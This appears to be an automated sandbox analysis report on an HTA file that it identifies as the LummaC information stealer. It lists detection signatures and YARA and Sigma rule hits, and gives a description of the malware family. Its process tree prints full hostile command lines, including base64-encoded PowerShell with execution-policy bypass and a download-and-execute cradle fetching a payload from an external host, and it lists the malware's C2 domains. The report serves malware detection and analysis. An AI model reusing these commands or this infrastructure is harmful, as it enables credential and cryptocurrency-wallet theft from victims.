Windows Analysis Report: s7.mp4.hta
Overview
General Information
Detection
Name | Score | Range | Whitelisted | Confidence |
---|---|---|---|---|
LummaC | 100 | 0 - 100 | false | 100% |
Signatures
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Powershell Download and Execute IEX
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Yara detected Powershell download and execute
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign process
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directories for files)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
- mshta.exe (PID: 4328 cmdline: mshta.exe "C:\Users\user\Desktop\s7.mp4.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
- powershell.exe (PID: 5820 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ep Unrestricted -w 1 sc $env:Temp\a.ps1 ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gU0xxKCRKRnhLeW5pail7DQooKCRKRnhLeW5paiAtc3BsaXQgJyg/PD1cRy4uKSd8JXskTHFsRlpScy5TdWJTdHJpbmcoMywxMDApWyRfXX0pICAtam9pbiAnJyAtcmVwbGFjZSAiLiQiKX07JExxbEZaUnMgPSdpZXhkT0pjeX5fNEc1X31nQUZtLUAwcHFZLnhCKW9oS2xRTHRCdS5XJVxhTW9JVEh7OjE2dlZlLypjeDdrdENYU3c7Um5pUXMwNEQjKDBOOWwyXCJmRTNyNWJ7IlJaOFV7MGp6UHZDNzU1MTU4MjIzNjUxODY5OTc3NjY1MTY1NTgn')));cmd.exe /k start powershell -w 1 ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('cG93ZXJzaGVsbCAtZW5jIFV3QjBBR0VBY2dCMEFDMEFVQUJ5QUc4QVl3QmxBSE1BY3dBZ0FDSUFRd0E2QUZ3QVZ3QnBBRzRBWkFCdkFIY0Fjd0JjQUZNQWVRQnpBRmNBYndCM0FEWUFOQUJjQUZjQWFRQnVBR1FBYndCM0FITUFVQUJ2QUhjQVpRQnlBRk1BYUFCbEFHd0FiQUJjQUhZQU1RQXVBREFBWEFCd0FHOEFkd0JsQUhJQWN3Qm9BR1VBYkFCc0FDNEFaUUI0QUdVQUlnQWdBQzBBUVFCeUFHY0FkUUJ0QUdVQWJnQjBBRXdBYVFCekFIUUFJQUFpQUMwQWR3QWdBR2dBYVFCa0FHUUFaUUJ1QUNBQUxRQmxBSEFBSUFCaUFIa0FjQUJoQUhNQWN3QWdBQzBBYmdCdkFIQUFJQUF0QUVNQWJ3QnRBRzBBWVFCdUFHUUFJQUJnQUNJQWFRQmxBSGdBSUFBb0FDZ0FUZ0JsQUhjQUxRQlBBR0lBYWdCbEFHTUFkQUFnQUZNQWVRQnpBSFFBWlFCdEFDNEFUZ0JsQUhRQUxnQlhBR1VBWWdCREFHd0FhUUJsQUc0QWRBQXBBQzRBUkFCdkFIY0FiZ0JzQUc4QVlRQmtBRk1BZEFCeUFHa0FiZ0JuQUNnQUp3Qm9BSFFBZEFCd0FITUFPZ0F2QUM4QWN3QTNBQzRBYXdCc0FHa0FjQUJrQUhrQWR3QnZBSG8BYVFCNUFDNEFjd0JvQUc4QWNBQXZBR2dBZFFCckFHc0FOd0F1QUdvQWNBQmxBR2NBSndBcEFDa0FZQUFpQUNJQUlBQXRBRmNBYVFCdUFHUUFid0IzQUZNQWRBQjVBR3dBWlFBZ0FFZ0FhUUJrQUdRQVpRQnVBQT09Oy4gJGVudjpUZW1wXGEucHMxOyBmdW5jdGlvbiBKRnhLeW5paigpe2Z1bmN0aW9uIHZvck9jKCRlUFNySlpLKXtpZighKFRlc3QtUGF0aCAtUGF0aCAkSW5MKSl7Y3VybCAoU0xxICRlUFNySlpLKSAtbyAkSW5MfX19SkZ4S3luaWo7'))) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- conhost.exe (PID: 3084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 2300 cmdline: "C:\Windows\system32\cmd.exe" /k start powershell -w 1 "powershell -enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcwA3AC4AawBsAGkAcABkAHkAdwBvAHoAaQB5AC4AcwBoAG8AcAAvAGgAdQBrAGsANwAuAGoAcABlAGcAJwApACkAYAAiACIAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuAA==;. $env:Temp\a.ps1; function JFxKynij(){function vorOc($ePSrJZK){if(!(Test-Path -Path $InL)){curl (SLq $ePSrJZK) -o $InL}}}JFxKynij;" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- powershell.exe (PID: 6524 cmdline: powershell -w 1 "powershell -enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcwA3AC4AawBsAGkAcABkAHkAdwBvAHoAaQB5AC4AcwBoAG8AcAAvAGgAdQBrAGsANwAuAGoAcABlAGcAJwApACkAYAAiACIAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuAA==;. $env:Temp\a.ps1; function JFxKynij(){function vorOc($ePSrJZK){if(!(Test-Path -Path $InL)){curl (SLq $ePSrJZK) -o $InL}}}JFxKynij;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- conhost.exe (PID: 4176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 5776 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcwA3AC4AawBsAGkAcABkAHkAdwBvAHoAaQB5AC4AcwBoAG8AcAAvAGgAdQBrAGsANwAuAGoAcABlAGcAJwApACkAYAAiACIAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuAA== MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- powershell.exe (PID: 5936 cmdline: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://s7.klipdywoziy.shop/hukk7.jpeg'))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- conhost.exe (PID: 1404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 8108 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- backgroundTaskHost.exe (PID: 5776 cmdline: "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppX4325622ft6437f3xfywcfxgbedfvpn0x.mca MD5: DA7063B17DBB8BBB3015351016868006)
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Lumma Stealer, LummaC2 Stealer | Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. | No Attribution | | |
{"C2 url": ["crowdwarek.shop", "chipdonkeruz.shop", "versersleep.shop", "hoppricerwir.cyou", "handscreamny.shop", "apporholis.shop", "soundtappysk.shop", "femalsabler.shop", "robinsharez.shop"], "Build id": "yJEcaG--singl7"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security | |
| JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security | |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | |
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | |
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | |
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | |
| JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | |
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems) |